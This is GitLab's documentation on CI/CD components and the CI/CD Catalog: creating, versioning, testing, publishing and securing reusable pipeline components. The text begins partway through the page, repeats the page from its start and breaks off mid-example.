stage: release image: registry.gitlab.com/gitlab-org/release-cli:latest script: echo "Creating release $CI_COMMIT_TAG" rules: - if: $CI_COMMIT_TAG release: tag_name: $CI_COMMIT_TAG description: "Release $CI_COMMIT_TAG of components in $CI_PROJECT_PATH" ``` 1. Create a [new tag](../../user/project/repository/tags/_index.md#create-a-tag) for the release, which should trigger a tag pipeline that contains the job responsible for creating the release. The tag must use [semantic versioning](#semantic-versioning). After the release job completes successfully, the release is created and the new version is published to the CI/CD catalog. #### Semantic versioning {{< history >}} - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/427286) in GitLab 16.10. {{< /history >}} When tagging and [releasing new versions](#publish-a-new-release) of components to the Catalog, you must use [semantic versioning](https://semver.org). Semantic versioning is the standard for communicating that a change is a major, minor, patch, or other kind of change. For example, `1.0.0`, `2.3.4`, and `1.0.0-alpha` are all valid semantic versions. ### Unpublish a component project To remove a component project from the catalog, turn off the [**CI/CD Catalog resource**](#set-a-component-project-as-a-catalog-project) toggle in the project settings. {{< alert type="warning" >}} This action destroys the metadata about the component project and its versions published in the catalog. The project and its repository still exist, but are not visible in the catalog. {{< /alert >}} To publish the component project in the catalog again, you need to [publish a new release](#publish-a-new-release). ### Verified component creators {{< history >}} - [Introduced for GitLab.com](https://gitlab.com/gitlab-org/gitlab/-/issues/433443) in GitLab 16.11 - [Introduced for GitLab Self-Managed and GitLab Dedicated](https://gitlab.com/gitlab-org/gitlab/-/issues/460125) in GitLab 18.1 {{< /history >}} Some CI/CD components are badged with an icon to show that the component was created and is maintained by users verified by GitLab or the instance administrator: - GitLab-maintained ({{< icon name="tanuki-verified" >}}): GitLab.com components that are created and maintained by GitLab. - GitLab Partner ({{< icon name="partner-verified" >}}): GitLab.com components that are independently created and maintained by a GitLab-verified partner. GitLab partners can contact a member of the GitLab Partner Alliance to have their namespace on GitLab.com flagged as GitLab-verified. Then any CI/CD components located in the namespace are badged as GitLab Partner components. The Partner Alliance member creates an [internal request issue (GitLab team members only)](https://gitlab.com/gitlab-com/support/internal-requests/-/issues/new?issuable_template=CI%20Catalog%20Badge%20Request) on behalf of the verified partner. {{< alert type="warning" >}} GitLab Partner-created components are provided **as-is**, without warranty of any kind. An end user's use of a GitLab Partner-created component is at their own risk and GitLab shall have no indemnification obligations nor any liability of any type with respect to the end user's use of the component. The end user's use of such content and any liability related thereto shall be between the publisher of the content and the end user. {{< /alert >}} - Verified creator ({{< icon name="check-sm" >}}): Components created and maintained by a user verified by an administrator. #### Set a component as maintained by a verified creator {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab Self-Managed, GitLab Dedicated {{< /details >}} {{< history >}} - [Introduced for GitLab Self-Managed and GitLab Dedicated](https://gitlab.com/gitlab-org/gitlab/-/issues/460125) in GitLab 18.1 {{< /history >}} A GitLab administrator can set a CI/CD component as created and maintained by a verified creator: 1. Open GraphiQL in the instance with your administrator account, for example at: `https://gitlab.example.com/-/graphql-explorer`. 1. Run this query, replacing `root-level-group` with the root namespace of the component to verify: ```graphql mutation { verifiedNamespaceCreate(input: { namespacePath: "root-level-group", verificationLevel: VERIFIED_CREATOR_SELF_MANAGED }) { errors } } ``` After the query completes, all components in projects in the root namespace are verified. The **Verified creator** badge displays next to the component names in the CI/CD catalog. To remove the badge from a component, repeat the query with `UNVERIFIED` for `verificationLevel`. ## Convert a CI/CD template to a component Any existing CI/CD template that you use in projects by using the `include:` syntax can be converted to a CI/CD component: 1. Decide if you want the component to be grouped with other components as part of an existing [component project](#component-project), or [create a new component project](#create-a-component-project). 1. Create a YAML file in the component project according to the [directory structure](#directory-structure). 1. Copy the content of the original template YAML file into the new component YAML file. 1. Refactor the new component's configuration to: - Follow the guidance on [writing a component](#write-a-component). - Improve the configuration, for example by enabling [merge request pipelines](../pipelines/merge_request_pipelines.md) or making it [more efficient](../pipelines/pipeline_efficiency.md). 1. Leverage the `.gitlab-ci.yml` in the components repository to [test changes to the component](#test-the-component). 1. Tag and [release the component](#publish-a-new-release). You can learn more by following a practical example for [migrating the Go CI/CD template to CI/CD component](examples.md#cicd-component-migration-example-go). ## Use a GitLab.com component on GitLab Self-Managed {{< details >}} - Tier: Premium, Ultimate - Offering: GitLab Self-Managed, GitLab Dedicated {{< /details >}} The CI/CD catalog of a fresh install of a GitLab instance starts with no published CI/CD components. To populate your instance's catalog, you can: - [Publish your own components](#publish-a-component-project). - Mirror components from GitLab.com in your GitLab Self-Managed instance. To mirror a GitLab.com component in your GitLab Self-Managed instance: 1. Make sure that [network outbound requests](../../security/webhooks.md) are allowed for `gitlab.com`. 1. [Create a group](../../user/group/_index.md#create-a-group) to host the component projects (recommended group: `components`). 1. [Create a mirror of the component project](../../user/project/repository/mirror/pull.md) in the new group. 1. Write a [project description](../../user/project/working_with_projects.md#edit-a-project) for the component project mirror because mirroring repositories does not copy the description. 1. [Set the self-hosted component project as a catalog resource](#set-a-component-project-as-a-catalog-project). 1. Publish [a new release](../../user/project/releases/_index.md) in the self-hosted component project by [running a pipeline](../pipelines/_index.md#run-a-pipeline-manually) for a tag (usually the latest tag). ## CI/CD component security best practices ### For component users As anyone can publish components to the catalog, you should carefully review components before using them in your project. Use of GitLab CI/CD components is at your own risk and GitLab cannot guarantee the security of third-party components. When using third-party CI/CD components, consider the following security best practices: - **Audit and review component source code**: Carefully examine the code to ensure it's free of malicious content. - **Minimize access to credentials and tokens**: - Audit the component's source code to verify that any credentials or tokens are only used to perform actions that you expect and authorize. - Use minimally scoped access tokens. - Avoid using long-lived access tokens or credentials. - Audit use of credentials and tokens used by CI/CD components. - **Use pinned versions**: Pin CI/CD components to a specific commit SHA (preferred) or release version tag to ensure the integrity of the component used in a pipeline. Only use release tags if you trust the component maintainer. Avoid using `latest`. - **Store secrets securely**: Do not store secrets in CI/CD configuration files. Avoid storing secrets and credentials in project settings if you can use an external secret management solution instead. - **Use ephemeral, isolated runner environments**: Run component jobs in temporary, isolated environments when possible. Be aware of [security risks](https://docs.gitlab.com/runner/security) with self-managed runners. - **Securely handle cache and artifacts**: Do not pass cache or artifacts from other jobs in your pipeline to CI/CD component jobs unless absolutely necessary. - **Limit CI_JOB_TOKEN access**: Restrict [CI/CD job token (`CI_JOB_TOKEN`) project access and permissions](../jobs/ci_job_token.md#control-job-token-access-to-your-project) for projects using CI/CD components. - **Review CI/CD component changes**: Carefully review all changes to the CI/CD component configuration before changing to use an updated commit SHA or release tag for the component. - **Audit custom container images**: Carefully review any custom container images used by the CI/CD component to ensure they are free of malicious content. ### For component maintainers To maintain secure and trustworthy CI/CD components and ensure the integrity of the pipeline configuration you deliver to users, follow these best practices: - **Use two-factor authentication (2FA)**: Ensure all CI/CD component project maintainers and owners have [2FA enabled](../../user/profile/account/two_factor_authentication.md#enable-two-factor-authentication), or enforce [2FA for all users in the group](../../security/two_factor_authentication.md#enforce-2fa-for-all-users-in-a-group). - **Use protected branches**: - Use [protected branches](../../user/project/repository/branches/protected.md) for component project releases. - Protect the default branch, and protect all release branches [using wildcard rules](../../user/project/repository/branches/protected.md#use-wildcard-rules). - Require everyone submit merge requests for changes to protected branches. Set the **Allowed to push and merge** option to `No one` for protected branches. - Block force pushes to protected branches. - **Sign all commits**: [Sign all commits](../../user/project/repository/signed_commits/_index.md) to the component project. - **Discourage using `latest`**: Avoid including examples in your `README.md` that use `@latest`. - **Limit dependency on caches and artifacts from other jobs**: Only use cache and artifacts from other jobs in CI/CD components if absolutely necessary - **Update CI/CD component dependencies**: Check for and apply updates to dependencies regularly. - **Review changes carefully**: - Carefully review all changes to the CI/CD component pipeline configuration before merging into default or release branches. - Use [merge request approvals](../../user/project/merge_requests/approvals/_index.md) for all user-facing changes to CI/CD component catalog projects. ## Troubleshooting ### `content not found` message You might receive an error message similar to the following when using the `~latest` version qualifier to reference a component hosted by a [catalog project](#set-a-component-project-as-a-catalog-project): ```plaintext This GitLab CI configuration is invalid: Component 'gitlab.com/my-namespace/my-project/my-component@~latest' - content not found ``` The `~latest` behavior [was updated](https://gitlab.com/gitlab-org/gitlab/-/issues/442238) in GitLab 16.10. It now refers to the latest semantic version of the catalog resource. To resolve this issue, [create a new release](#publish-a-new-release). ### Error: `Build component error: Spec must be a valid json schema` If a component has invalid formatting, you might not be able to create a release and could receive an error like `Build component error: Spec must be a valid json schema`. This error can be caused by an empty `spec:inputs` section. If your configuration does not use any inputs, you can make the `spec` section empty instead. For example: ```yaml spec: --- my-component: script: echo ```
--- stage: Verify group: Pipeline Authoring info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: CI/CD components description: Reusable, versioned CI/CD components for pipelines. breadcrumbs: - doc - ci - components --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} {{< history >}} - Introduced as an [experimental feature](../../policy/development_stages_support.md#experiment) in GitLab 16.0, [with a flag](../../administration/feature_flags/_index.md) named `ci_namespace_catalog_experimental`. Disabled by default. - [Enabled on GitLab.com and GitLab Self-Managed](https://gitlab.com/groups/gitlab-org/-/epics/9897) in GitLab 16.2. - [Feature flag `ci_namespace_catalog_experimental` removed](https://gitlab.com/gitlab-org/gitlab/-/issues/394772) in GitLab 16.3. - [Moved](https://gitlab.com/gitlab-com/www-gitlab-com/-/merge_requests/130824) to [beta](../../policy/development_stages_support.md#beta) in GitLab 16.6. - [Made generally available](https://gitlab.com/gitlab-com/www-gitlab-com/-/merge_requests/134062) in GitLab 17.0. {{< /history >}} A CI/CD component is a reusable single pipeline configuration unit. Use components to create a small part of a larger pipeline, or even to compose a complete pipeline configuration. A component can be configured with [input parameters](../inputs/_index.md) for more dynamic behavior. CI/CD components are similar to the other kinds of [configuration added with the `include` keyword](../yaml/includes.md), but have several advantages: - Components can be listed in the [CI/CD Catalog](#cicd-catalog). - Components can be released and used with a specific version. - Multiple components can be defined in the same project and versioned together. Instead of creating your own components, you can also search for published components that have the functionality you need in the [CI/CD Catalog](#cicd-catalog). <i class="fa fa-youtube-play youtube" aria-hidden="true"></i> For an introduction and hands-on examples, see [Efficient DevSecOps workflows with reusable CI/CD components](https://www.youtube.com/watch?v=-yvfSFKAgbA). <!-- Video published on 2024-01-22. DRI: Developer Relations, https://gitlab.com/groups/gitlab-com/marketing/developer-relations/-/epics/399 --> For common questions and additional support, see the [FAQ: GitLab CI/CD Catalog](https://about.gitlab.com/blog/2024/08/01/faq-gitlab-ci-cd-catalog/) blog post. ## Component project {{< history >}} - The maximum number of components per project [changed](https://gitlab.com/gitlab-org/gitlab/-/issues/436565) from 10 to 30 in GitLab 16.9. {{< /history >}} A component project is a GitLab project with a repository that hosts one or more components. All components in the project are versioned together, with a maximum of 30 components per project. If a component requires different versioning from other components, the component should be moved to a dedicated component project. ### Create a component project To create a component project, you must: 1. [Create a new project](../../user/project/_index.md#create-a-blank-project) with a `README.md` file: - Ensure the description gives a clear introduction to the component. - Optional. After the project is created, you can [add a project avatar](../../user/project/working_with_projects.md#add-a-project-avatar). Components published to the [CI/CD catalog](#cicd-catalog) use both the description and avatar when displaying the component project's summary. 1. Add a YAML configuration file for each component, following the [required directory structure](#directory-structure). For example: ```yaml spec: inputs: stage: default: test --- component-job: script: echo job 1 stage: $[[ inputs.stage ]] ``` You can [use the component](#use-a-component) immediately, but you might want to consider publishing the component to the [CI/CD catalog](#cicd-catalog). ### Directory structure The repository must contain: - A `README.md` Markdown file documenting the details of all the components in the repository. - A top level `templates/` directory that contains all the component configurations. In this directory: - For simple components, use single files ending in `.yml` for each component, like `templates/secret-detection.yml`. - For complex components, create subdirectories with a `template.yml` for each component, like `templates/secret-detection/template.yml`. Only the `template.yml` file is used by other projects using the component. Other files in these directories are not released with the component, but can be used for things like tests or building container images. {{< alert type="note" >}} Optionally, each component can also have its own `README.md` file that provides more detailed information, and can be linked from the top-level `README.md` file. This helps to provide a better overview of your component project and how to use it. {{< /alert >}} You should also: - Configure the project's `.gitlab-ci.yml` to [test the components](#test-the-component) and [release new versions](#publish-a-new-release). - Add a `LICENSE.md` file with a license of your choice that covers the usage of your component. For example the [MIT](https://opensource.org/license/mit) or [Apache 2.0](https://www.apache.org/licenses/LICENSE-2.0#apply) open source licenses. For example: - If the project contains a single component, the directory structure should be similar to: ```plaintext ├── templates/ │ └── my-component.yml ├── LICENSE.md ├── README.md └── .gitlab-ci.yml ``` - If the project contains multiple components, then the directory structure should be similar to: ```plaintext ├── templates/ │ ├── my-simple-component.yml │ └── my-complex-component/ │ ├── template.yml │ ├── Dockerfile │ └── test.sh ├── LICENSE.md ├── README.md └── .gitlab-ci.yml ``` In this example: - The `my-simple-component` component's configuration is defined in a single file. - The `my-complex-component` component's configuration contains multiple files in a directory. ## Use a component Prerequisites: If you are a member of a parent group that contains the current group or project: - You must have the minimum role set by the visibility level of the project's parent group. For example, you must have at least the Reporter role if a parent project is set to **Private**. To add a component to a project's CI/CD configuration, use the [`include: component`](../yaml/_index.md#includecomponent) keyword. The component reference is formatted as `<fully-qualified-domain-name>/<project-path>/<component-name>@<specific-version>`, for example: ```yaml include: - component: $CI_SERVER_FQDN/my-org/security-components/secret-detection@1.0.0 inputs: stage: build ``` In this example: - `$CI_SERVER_FQDN` is a [predefined variable](../variables/predefined_variables.md) for the fully qualified domain name (FQDN) matching the GitLab host. You can only reference components in the same GitLab instance as your project. - `my-org/security-components` is the full path of the project containing the component. - `secret-detection` is the component name that is defined as either a single file `templates/secret-detection.yml` or as a directory `templates/secret-detection/` containing a `template.yml`. - `1.0.0` is the [version](#component-versions) of the component. Pipeline configuration and component configuration are not processed independently. When a pipeline starts, any included component configuration [merges](../yaml/includes.md#merge-method-for-include) into the pipeline's configuration. If your pipeline and the component both contain configuration with the same name, they can interact in unexpected ways. For example, two jobs with the same name would merge together into a single job. Similarly, a component using `extends` for configuration with the same name as a job in your pipeline could extend the wrong configuration. Make sure your pipeline and the component do not share any configuration with the same name, unless you intend to [override](../yaml/includes.md#override-included-configuration-values) the component's configuration. To use GitLab.com components on a GitLab Self-Managed instance, you must [mirror the component project](#use-a-gitlabcom-component-on-gitlab-self-managed). {{< alert type="warning" >}} If a component requires the use of tokens, passwords, or other sensitive data to function, be sure to audit the component's source code to verify that the data is only used to perform actions that you expect and authorize. You should also use tokens and secrets with the minimum permissions, access, or scope required to complete the action. {{< /alert >}} ### Component versions In order of highest priority first, the component version can be: - A commit SHA, for example `e3262fdd0914fa823210cdb79a8c421e2cef79d8`. - A tag, for example: `1.0.0`. If a tag and commit SHA exist with the same name, the commit SHA takes precedence over the tag. Components released to the CI/CD Catalog should be tagged with a [semantic version](#semantic-versioning). - A branch name, for example `main`. If a branch and tag exist with the same name, the tag takes precedence over the branch. - `~latest`, which always points to the latest semantic version published in the CI/CD Catalog. Use `~latest` only if you want to use the absolute latest version at all times, which could include breaking changes. `~latest` does not include pre-releases, for example `1.0.1-rc`, which are not considered production-ready. You can use any version supported by the component, but using a version published to the CI/CD catalog is recommended. The version referenced with a commit SHA or branch name might not be published in the CI/CD catalog, but could be used for testing. #### Semantic version ranges {{< history >}} - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/450835) in GitLab 16.11 {{< /history >}} When [referencing a CI/CD catalog component](#component-versions), you can use a special format to specify the latest [semantic version](#semantic-versioning) in a range. This approach offers significant benefits for both consumers and authors of components: - For users, using version ranges is an excellent way to automatically receive minor or patch updates without risking breaking changes from major releases. This ensures your pipelines stay up-to-date with the latest bug fixes and security patches while maintaining stability. - For component authors, the use of version ranges allows major version releases without risk of immediately breaking existing pipelines. Users who have specified version ranges continue to use the latest compatible minor or patch version, giving them time to update their pipelines at their own pace. To specify the latest release of: - A minor version, use both the major and minor version numbers in the reference, but not the patch version number. For example, use `1.1` to use the latest version that starts with `1.1`, including `1.1.0` or `1.1.9`, but not `1.2.0`. - A major version, use only the major version number in the reference. For example, use `1` to use the latest version that starts with `1.`, like `1.0.0` or `1.9.9`, but not `2.0.0`. - All versions, use `~latest` to use the latest released version. For example, a component is released in this exact order: 1. `1.0.0` 1. `1.1.0` 1. `2.0.0` 1. `1.1.1` 1. `1.2.0` 1. `2.1.0` 1. `2.0.1` In this example, referencing the component with: - `1` would use the `1.2.0` version. - `1.1` would use the `1.1.1` version. - `~latest` would use the `2.1.0` version. Pre-release versions are never fetched when referencing a version range. To fetch a pre-release version, specify the full version, for example `1.0.1-rc`. ## Write a component This section describes some best practices for creating high quality component projects. ### Manage dependencies While it's possible for a component to use other components in turn, make sure to carefully select the dependencies. To manage dependencies, you should: - Keep dependencies to a minimum. A small amount of duplication is usually better than having dependencies. - Rely on local dependencies whenever possible. For example, using [`include:local`](../yaml/_index.md#includelocal) is a good way to ensure the same Git SHA is used across multiple files. - When depending on components from other projects, pin their version to a release from the catalog rather than using moving target versions such as `~latest` or a Git reference. Using a release or Git SHA guarantees that you are fetching the same revision all the time and that consumers of your component get consistent behavior. - Update your dependencies regularly by pinning them to newer releases. Then publish a new release of your components with updated dependencies. - Evaluate the permissions of dependencies, and use dependencies that require the least amount of permissions. For example, if you need to build an image, consider using [Buildah](https://buildah.io/) instead of Docker, so that you don't require a Runner with a privileged Docker daemon. ### Write a clear `README.md` Each component project should have clear and comprehensive documentation. To write a good `README.md` file: - The documentation should start with a summary of the capabilities that the components in the project provide. - If the project contains multiple components, use a [table of contents](../../user/markdown.md#table-of-contents) to help users quickly jump to a specific component's details. - Add a `## Components` section with sub-sections like `### Component A` for each component in the project. - In each component section: - Add a description of what the component does. - Add at least one YAML example showing how to use it. - If the component uses inputs, add a table showing all inputs with name, description, type, and default value. - If the component uses any variables or secrets, those should be documented too. - A `## Contribute` section is recommended if contributions are welcome. If a component needs more instructions, add additional documentation in a Markdown file in the component directory and link to it from the main `README.md` file. For example: ```plaintext README.md # with links to the specific docs.md templates/ ├── component-1/ │ ├── template.yml │ └── docs.md └── component-2/ ├── template.yml └── docs.md ``` For an example of a component `README.md`, see the [Deploy to AWS with GitLab CI/CD component's `README.md`](https://gitlab.com/components/aws/-/blob/main/README.md). ### Test the component Testing CI/CD components as part of the development workflow is strongly recommended and helps ensure consistent behavior. Test changes in a CI/CD pipeline (like any other project) by creating a `.gitlab-ci.yml` in the root directory. Make sure to test both the behavior and potential side-effects of the component. You can use the [GitLab API](../../api/rest/_index.md) if needed. For example: ```yaml include: # include the component located in the current project from the current SHA - component: $CI_SERVER_FQDN/$CI_PROJECT_PATH/my-component@$CI_COMMIT_SHA inputs: stage: build stages: [build, test, release] # Check if `component job of my-component` is added. # This example job could also test that the included component works as expected. # You can inspect data generated by the component, use GitLab API endpoints, or third-party tools. ensure-job-added: stage: test image: badouralix/curl-jq # Replace "component job of my-component" with the job name in your component. script: - | route="${CI_API_V4_URL}/projects/${CI_PROJECT_ID}/pipelines/${CI_PIPELINE_ID}/jobs" count=`curl --silent "$route" | jq 'map(select(.name | contains("component job of my-component"))) | length'` if [ "$count" != "1" ]; then exit 1; else echo "Component Job present" fi # If the pipeline is for a new tag with a semantic version, and all previous jobs succeed, # create the release. create-release: stage: release image: registry.gitlab.com/gitlab-org/release-cli:latest script: echo "Creating release $CI_COMMIT_TAG" rules: - if: $CI_COMMIT_TAG release: tag_name: $CI_COMMIT_TAG description: "Release $CI_COMMIT_TAG of components repository $CI_PROJECT_PATH" ``` After committing and pushing changes, the pipeline tests the component, then creates a release if the earlier jobs pass. {{< alert type="note" >}} Authentication is necessary if the project is private. {{< /alert >}} #### Test a component against sample files In some cases, components require source files to interact with. For example, a component that builds Go source code likely needs some samples of Go to test against. Alternatively, a component that builds Docker images likely needs some sample Dockerfiles to test against. You can include sample files like these directly in the component project, to be used during component testing. You can learn more in [examples for testing a component](examples.md#test-a-component). ### Avoid hard-coding instance or project-specific values When [using another component](#use-a-component) in your component, use `$CI_SERVER_FQDN` instead of your instance's Fully Qualified Domain Name (like `gitlab.com`). When accessing the GitLab API in your component, use the `$CI_API_V4_URL` instead of the full URL and path for your instance (like `https://gitlab.com/api/v4`). These [predefined variables](../variables/predefined_variables.md) ensure that your component also works when used on another instance, for example when using [a GitLab.com component on a GitLab Self-Managed instance](#use-a-gitlabcom-component-on-gitlab-self-managed). ### Do not assume API resources are always public Ensure that the component and its testing pipeline work also [on GitLab Self-Managed](#use-a-gitlabcom-component-on-gitlab-self-managed). While some API resources of public projects on GitLab.com could be accessed via unauthenticated requests on a GitLab Self-Managed instance a component project could be mirrored as private or internal project. It's important that an access token can optionally be provided via inputs or variables to authenticate requests on GitLab Self-Managed instances. ### Avoid using global keywords Avoid using [global keywords](../yaml/_index.md#global-keywords) in a component. Using these keywords in a component affects all jobs in a pipeline, including jobs directly defined in the main `.gitlab-ci.yml` or in other included components. As an alternative to global keywords: - Add the configuration directly to each job, even if it creates some duplication in the component configuration. - Use the [`extends`](../yaml/_index.md#extends) keyword in the component, but use unique names that reduce the risk of naming conflicts when the component is merged into the configuration. For example, avoid using the `default` global keyword: ```yaml # Not recommended default: image: ruby:3.0 rspec-1: script: bundle exec rspec dir1/ rspec-2: script: bundle exec rspec dir2/ ``` Instead, you can: - Add the configuration to each job explicitly: ```yaml rspec-1: image: ruby:3.0 script: bundle exec rspec dir1/ rspec-2: image: ruby:3.0 script: bundle exec rspec dir2/ ``` - Use `extends` to reuse configuration: ```yaml .rspec-image: image: ruby:3.0 rspec-1: extends: - .rspec-image script: bundle exec rspec dir1/ rspec-2: extends: - .rspec-image script: bundle exec rspec dir2/ ``` ### Replace hardcoded values with inputs Avoid using hardcoded values in CI/CD components. Hardcoded values might force component users to need to review the component's internal details and adapt their pipeline to work with the component. A common keyword with problematic hard-coded values is `stage`. If a component job's stage is hardcoded, all pipelines using the component **must** either define the exact same stage, or [override](../yaml/includes.md#override-included-configuration-values) the configuration. The preferred method is to use the [`input` keyword](../inputs/_index.md) for dynamic component configuration. The component user can specify the exact value they need. For example, to create a component with `stage` configuration that can be defined by users: - In the component configuration: ```yaml spec: inputs: stage: default: test --- unit-test: stage: $[[ inputs.stage ]] script: echo unit tests integration-test: stage: $[[ inputs.stage ]] script: echo integration tests ``` - In a project using the component: ```yaml stages: [verify, release] include: - component: $CI_SERVER_FQDN/myorg/ruby/test@1.0.0 inputs: stage: verify ``` #### Define job names with inputs Similar to the values for the `stage` keyword, you should avoid hard-coding job names in CI/CD components. When your component's users can customize job names, they can prevent conflicts with the existing names in their pipelines. Users could also include a component multiple times with different input options by using different names. Use `inputs` to allow your component's users to define a specific job name, or a prefix for the job name. For example: ```yaml spec: inputs: job-prefix: description: "Define a prefix for the job name" job-name: description: "Alternatively, define the job's name" job-stage: default: test --- "$[[ inputs.job-prefix ]]-scan-website": stage: $[[ inputs.job-stage ]] script: - scan-website-1 "$[[ inputs.job-name ]]": stage: $[[ inputs.job-stage ]] script: - scan-website-2 ``` ### Replace custom CI/CD variables with inputs When using CI/CD variables in a component, evaluate if the `inputs` keyword should be used instead. Avoid asking users to define custom variables to configure components when `inputs` is a better solution. Inputs are explicitly defined in the component's `spec` section, and have better validation than variables. For example, if a required input is not passed to the component, GitLab returns a pipeline error. By contrast, if a variable is not defined, its value is empty, and there is no error. For example, use `inputs` instead of variables to configure a scanner's output format: - In the component configuration: ```yaml spec: inputs: scanner-output: default: json --- my-scanner: script: my-scan --output $[[ inputs.scanner-output ]] ``` - In the project using the component: ```yaml include: - component: $CI_SERVER_FQDN/path/to/project/my-scanner@1.0.0 inputs: scanner-output: yaml ``` In other cases, CI/CD variables might still be preferred. For example: - Use [predefined variables](../variables/predefined_variables.md) to automatically configure a component to match a user's project. - Ask users to store sensitive values as [masked or protected CI/CD variables in project settings](../variables/_index.md#define-a-cicd-variable-in-the-ui). ## CI/CD Catalog {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} {{< history >}} - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/407249) as an [experiment](../../policy/development_stages_support.md#experiment) in GitLab 16.1. - [Moved](https://gitlab.com/gitlab-org/gitlab/-/issues/432045) to [beta](../../policy/development_stages_support.md#beta) in GitLab 16.7. - [Made Generally Available](https://gitlab.com/gitlab-org/gitlab/-/issues/454306) in GitLab 17.0. {{< /history >}} The [CI/CD Catalog](https://gitlab.com/explore/catalog) is a list of projects with published CI/CD components you can use to extend your CI/CD workflow. Anyone can [create a component project](#create-a-component-project) and add it to the CI/CD Catalog, or contribute to an existing project to improve the available components. For a click-through demo, see [the CI/CD Catalog beta Product Tour](https://gitlab.navattic.com/cicd-catalog). <!-- Demo published on 2024-01-24 --> ### View the CI/CD Catalog To access the CI/CD Catalog and view the published components that are available to you: 1. On the left sidebar, select **Search or go to**. 1. Select **Explore**. 1. Select **CI/CD Catalog**. Alternatively, if you are already in the [pipeline editor](../pipeline_editor/_index.md) in your project, you can select **CI/CD Catalog**. Visibility of components in the CI/CD catalog follows the component source project's [visibility setting](../../user/public_access.md). Components with source projects set to: - Private are visible only to users assigned at least the Guest role for the source component project. To use a component, you must have at least the Reporter role. - Internal are visible only to users logged into the GitLab instance. - Public are visible to anyone with access to the GitLab instance. ### Publish a component project To publish a component project in the CI/CD catalog, you must: 1. Set the project as a catalog project. 1. Publish a new release. #### Set a component project as a catalog project To make published versions of a component project visible in the CI/CD catalog, you must set the project as a catalog project. Prerequisites: - You must have the Owner role for the project. To set the project as a catalog project: 1. On the left sidebar, select **Search or go to** and find your project. 1. Select **Settings > General**. 1. Expand **Visibility, project features, permissions**. 1. Turn on the **CI/CD Catalog project** toggle. The project only becomes findable in the catalog after you publish a new release. To use automation to enable this setting, you can use the [`mutationcatalogresourcescreate`](../../api/graphql/reference/_index.md#mutationcatalogresourcescreate) GraphQL endpoint. [Issue 463043](https://gitlab.com/gitlab-org/gitlab/-/issues/463043) proposes to expose this in the REST API as well. #### Publish a new release CI/CD components can be [used](#use-a-component) without being listed in the CI/CD catalog. However, publishing a component's releases in the catalog makes it discoverable to other users. Prerequisites: - You must have at least the Maintainer role for the project. - The project must: - Be set as a [catalog project](#set-a-component-project-as-a-catalog-project). - Have a [project description](../../user/project/working_with_projects.md#edit-a-project) defined. - Have a `README.md` file in the root directory for the commit SHA of the tag being released. - Have at least one [CI/CD component in the `templates/` directory](#directory-structure) for the commit SHA of the tag being released. - You must use the [`release` keyword](../yaml/_index.md#release) in a CI/CD job to create the release, not the [Releases API](../../api/releases/_index.md#create-a-release). To publish a new version of the component to the catalog: 1. Add a job to the project's `.gitlab-ci.yml` file that uses the `release` keyword to create the new release when a tag is created. You should configure the tag pipeline to [test the components](#test-the-component) before running the release job. For example: ```yaml create-release: stage: release image: registry.gitlab.com/gitlab-org/release-cli:latest script: echo "Creating release $CI_COMMIT_TAG" rules: - if: $CI_COMMIT_TAG release: tag_name: $CI_COMMIT_TAG description: "Release $CI_COMMIT_TAG of components in $CI_PROJECT_PATH" ``` 1. Create a [new tag](../../user/project/repository/tags/_index.md#create-a-tag) for the release, which should trigger a tag pipeline that contains the job responsible for creating the release. The tag must use [semantic versioning](#semantic-versioning). After the release job completes successfully, the release is created and the new version is published to the CI/CD catalog. #### Semantic versioning {{< history >}} - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/427286) in GitLab 16.10. {{< /history >}} When tagging and [releasing new versions](#publish-a-new-release) of components to the Catalog, you must use [semantic versioning](https://semver.org). Semantic versioning is the standard for communicating that a change is a major, minor, patch, or other kind of change. For example, `1.0.0`, `2.3.4`, and `1.0.0-alpha` are all valid semantic versions. ### Unpublish a component project To remove a component project from the catalog, turn off the [**CI/CD Catalog resource**](#set-a-component-project-as-a-catalog-project) toggle in the project settings. {{< alert type="warning" >}} This action destroys the metadata about the component project and its versions published in the catalog. The project and its repository still exist, but are not visible in the catalog. {{< /alert >}} To publish the component project in the catalog again, you need to [publish a new release](#publish-a-new-release). ### Verified component creators {{< history >}} - [Introduced for GitLab.com](https://gitlab.com/gitlab-org/gitlab/-/issues/433443) in GitLab 16.11 - [Introduced for GitLab Self-Managed and GitLab Dedicated](https://gitlab.com/gitlab-org/gitlab/-/issues/460125) in GitLab 18.1 {{< /history >}} Some CI/CD components are badged with an icon to show that the component was created and is maintained by users verified by GitLab or the instance administrator: - GitLab-maintained ({{< icon name="tanuki-verified" >}}): GitLab.com components that are created and maintained by GitLab. - GitLab Partner ({{< icon name="partner-verified" >}}): GitLab.com components that are independently created and maintained by a GitLab-verified partner. GitLab partners can contact a member of the GitLab Partner Alliance to have their namespace on GitLab.com flagged as GitLab-verified. Then any CI/CD components located in the namespace are badged as GitLab Partner components. The Partner Alliance member creates an [internal request issue (GitLab team members only)](https://gitlab.com/gitlab-com/support/internal-requests/-/issues/new?issuable_template=CI%20Catalog%20Badge%20Request) on behalf of the verified partner. {{< alert type="warning" >}} GitLab Partner-created components are provided **as-is**, without warranty of any kind. An end user's use of a GitLab Partner-created component is at their own risk and GitLab shall have no indemnification obligations nor any liability of any type with respect to the end user's use of the component. The end user's use of such content and any liability related thereto shall be between the publisher of the content and the end user. {{< /alert >}} - Verified creator ({{< icon name="check-sm" >}}): Components created and maintained by a user verified by an administrator. #### Set a component as maintained by a verified creator {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab Self-Managed, GitLab Dedicated {{< /details >}} {{< history >}} - [Introduced for GitLab Self-Managed and GitLab Dedicated](https://gitlab.com/gitlab-org/gitlab/-/issues/460125) in GitLab 18.1 {{< /history >}} A GitLab administrator can set a CI/CD component as created and maintained by a verified creator: 1. Open GraphiQL in the instance with your administrator account, for example at: `https://gitlab.example.com/-/graphql-explorer`. 1. Run this query, replacing `root-level-group` with the root namespace of the component to verify: ```graphql mutation { verifiedNamespaceCreate(input: { namespacePath: "root-level-group", verificationLevel: VERIFIED_CREATOR_SELF_MANAGED }) { 